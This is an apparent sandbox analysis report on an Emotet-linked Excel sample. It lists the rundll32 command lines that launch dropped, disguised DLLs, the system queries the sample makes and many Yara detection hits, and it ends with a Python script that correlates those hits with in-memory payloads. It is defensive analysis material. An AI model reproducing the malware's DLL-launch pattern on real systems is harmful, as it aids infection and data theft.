                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",OOkfVaPZ
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",xvIpPUnGjiWnFD
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",mYtMYmZ
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",DllRegisterServer
                            Source: Yara match File source: 364453688149503140239183.xls, type: SAMPLE
                            Source: Yara match File source: C:\Users\user\Desktop\364453688149503140239183.xls, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP,
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,
                            Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003DAA7 cpuid
                            Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,

                            Stealing of Sensitive Information

                            Source: Yara match File source: 12.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 10.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 11.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 17.2.rundll32.exe.2e90000.16.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 12.2.rundll32.exe.2850000.9.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 17.2.rundll32.exe.380000.2.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 11.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 12.2.rundll32.exe.4b0000.2.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 12.2.rundll32.exe.a30000.4.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 12.2.rundll32.exe.b20000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 15.2.rundll32.exe.2520000.10.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 17.2.rundll32.exe.cc0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 12.2.rundll32.exe.bd0000.7.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 10.2.rundll32.exe.2e00000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 10.2.rundll32.exe.2820000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 16.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 10.2.rundll32.exe.3020000.13.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 15.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 15.2.rundll32.exe.a30000.6.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 12.2.rundll32.exe.a30000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 17.2.rundll32.exe.b80000.5.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 17.2.rundll32.exe.2860000.10.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 16.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 10.2.rundll32.exe.2820000.8.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 10.2.rundll32.exe.2f40000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 17.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 16.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 10.2.rundll32.exe.470000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 15.2.rundll32.exe.2e40000.12.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 17.2.rundll32.exe.2c90000.13.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 9.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 15.2.rundll32.exe.2f60000.13.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 15.2.rundll32.exe.24f0000.9.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 17.2.rundll32.exe.25e0000.7.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 10.2.rundll32.exe.310000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 10.2.rundll32.exe.440000.3.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 15.2.rundll32.exe.3a0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 10.2.rundll32.exe.2dd0000.9.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 15.2.rundll32.exe.24f0000.9.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 17.2.rundll32.exe.380000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 12.2.rundll32.exe.30b0000.13.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 12.2.rundll32.exe.ac0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.4b0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2c60000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.b20000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.bd0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d00000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.b10000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.5a0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.b50000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.b50000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.26a0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.cc0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e80000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e60000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.4e0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.26d0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e00000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a00000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2860000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2c60000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2910000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2fe0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2fe0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.8f0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.840000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.b50000.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.840000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.b00000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2590000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.26a0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.350000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.ae0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2910000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.bc0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3a0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2ec0000.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.27e0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d00000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2590000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.310000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.27e0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2890000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.b50000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e90000.16.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.10000000.18.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.470000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2f40000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a00000.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.b10000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000F.00000002.616456228.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512416856.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.683540331.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617069039.00000000008F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564980270.00000000030B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616617596.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564788037.0000000002851000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679113549.0000000000351000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681597853.0000000002C91000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617285505.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564756951.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564304775.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564841038.0000000002910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512269279.0000000002820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617389585.0000000002590000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.680671662.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.680752870.00000000026D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679483027.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617514155.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679062553.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681792444.0000000002EC1000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.620719407.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681556359.0000000002C60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679555584.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.511939105.0000000000441000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681640222.0000000002D00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.566974916.0000000000B01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681204228.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.620541885.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616727376.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617246098.0000000000BC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.511964806.0000000000470000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.620492867.0000000000270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564618433.0000000000AC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564587056.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617654875.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617205636.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.566592140.0000000000210000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565021247.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512350669.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617317530.0000000002521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679178655.00000000005A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512137672.0000000000AE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564430858.00000000004E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.680211767.00000000025E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.511865871.0000000000310000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.511778687.0000000000170000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564371056.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564944730.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.514931269.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681736430.0000000002E90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679134510.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.567255358.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617576888.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.460063482.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564702502.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512384350.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681713030.0000000002E61000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681364704.0000000002891000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512450327.0000000003021000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564887911.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679503750.0000000000B81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616926650.0000000000840000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564646354.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512203615.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617169491.0000000000A31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512323278.0000000002DD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.514649253.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564333785.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512502215.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617141455.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.514700543.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512166505.0000000000B10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\QWER.dll, type: DROPPED
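The identifiers in the Yara-match list above encode where each hit was found: `<process index>.<stage>.<image>.<base address>.<dump index>[.raw].unpack` for PE images extracted from a process, and eight dotted hex fields for raw memory dumps (`.sdmp`), where the first field is the same process index in hex (0000000F = process 15) and the fourth is the region base. The Python below is an added example, not part of the Joe Sandbox report, that parses both forms and correlates them per process so that an analyst can see which rundll32 instances hold an unpacked Emotet image in a region that was allocated, written and executed in memory rather than mapped from disk. Reading the fifth `.sdmp` field as the Windows page protection (0x40 PAGE_EXECUTE_READWRITE, 0x20 PAGE_EXECUTE_READ) and the seventh as the region type (0x20000 MEM_PRIVATE, 0x1000000 MEM_IMAGE) is an assumption; it is consistent with every value on this page but is not documented here. The input list is a copied subset of the report's own identifiers.

```python
import re
from collections import defaultdict

# Subset of the 'File source:' strings from the Yara-match list above (copied verbatim).
YARA_SOURCES = [
    "15.2.rundll32.exe.1c0000.0.unpack",
    "15.2.rundll32.exe.2520000.10.unpack",
    "10.2.rundll32.exe.2820000.8.raw.unpack",
    "10.2.rundll32.exe.2820000.8.unpack",
    "17.2.rundll32.exe.10000000.18.unpack",
    "0000000F.00000002.616456228.00000000001C0000.00000040.00000800.00020000.00000000.sdmp",
    "0000000A.00000002.512269279.0000000002820000.00000040.00000800.00020000.00000000.sdmp",
    "00000011.00000002.683540331.0000000010001000.00000020.00000001.01000000.0000000E.sdmp",
    "C:\\ProgramData\\QWER.dll",
]

# <pid>.<stage>.<image>.<base hex>.<index>[.raw].unpack   e.g. 15.2.rundll32.exe.1c0000.0.unpack
UNPACK_RE = re.compile(
    r"^(?P<pid>\d+)\.(?P<stage>\d+)\.(?P<image>.+?)\.(?P<base>[0-9a-f]+)\.(?P<idx>\d+)\.(?P<raw>raw\.)?unpack$"
)
# <pid>.<stage>.<dump id>.<base>.<protect>.<f6>.<type>.<f8>.sdmp   (hex fields; dump id is decimal)
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\.(?P<dump>\d+)\.(?P<base>[0-9A-F]{16})"
    r"\.(?P<protect>[0-9A-F]{8})\.(?P<f6>[0-9A-F]{8})\.(?P<mtype>[0-9A-F]{8})\.(?P<f8>[0-9A-F]{8})\.sdmp$"
)

# Windows memory constants. ASSUMPTION: field 5 of the .sdmp name is the page protection
# and field 7 the region type; the report does not document this, the values only fit it.
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
MEM_PRIVATE = 0x20000
MEM_IMAGE = 0x1000000


def parse_source(src):
    """Classify one 'File source:' string into an unpacked PE, a memory dump, or a dropped file."""
    m = UNPACK_RE.match(src)
    if m:
        return {"kind": "unpacked_pe", "pid": int(m["pid"]), "image": m["image"],
                "base": int(m["base"], 16), "raw": m["raw"] is not None}
    m = SDMP_RE.match(src)
    if m:
        return {"kind": "memory", "pid": int(m["pid"], 16), "base": int(m["base"], 16),
                "protect": int(m["protect"], 16), "mtype": int(m["mtype"], 16)}
    return {"kind": "dropped_file", "path": src}


def summarize(sources):
    """Group Yara hits per process index. Returns (per_pid, dropped_paths)."""
    per_pid = defaultdict(lambda: {"unpacked": set(), "rwx_private": set(), "image": set()})
    dropped = []
    for src in sources:
        rec = parse_source(src)
        if rec["kind"] == "dropped_file":
            dropped.append(rec["path"])
            continue
        entry = per_pid[rec["pid"]]
        if rec["kind"] == "unpacked_pe":
            entry["unpacked"].add(rec["base"])
        elif rec["protect"] == PAGE_EXECUTE_READWRITE and rec["mtype"] == MEM_PRIVATE:
            entry["rwx_private"].add(rec["base"])   # allocated + written + executed in memory
        elif rec["mtype"] == MEM_IMAGE:
            entry["image"].add(rec["base"])         # a DLL the loader mapped from disk
    return dict(per_pid), dropped


def in_memory_payloads(per_pid):
    """Processes where an extracted PE sits at the base of a private RWX region:
    the classic signature of a payload unpacked in memory rather than loaded as a file."""
    return {pid: e["unpacked"] & e["rwx_private"]
            for pid, e in per_pid.items() if e["unpacked"] & e["rwx_private"]}


if __name__ == "__main__":
    per_pid, dropped = summarize(YARA_SOURCES)
    for pid, hits in sorted(in_memory_payloads(per_pid).items()):
        print(f"process {pid}: Emotet image unpacked in RWX memory at "
              + ", ".join(hex(b) for b in sorted(hits)))
    print("dropped files with Yara hits:", dropped)
```

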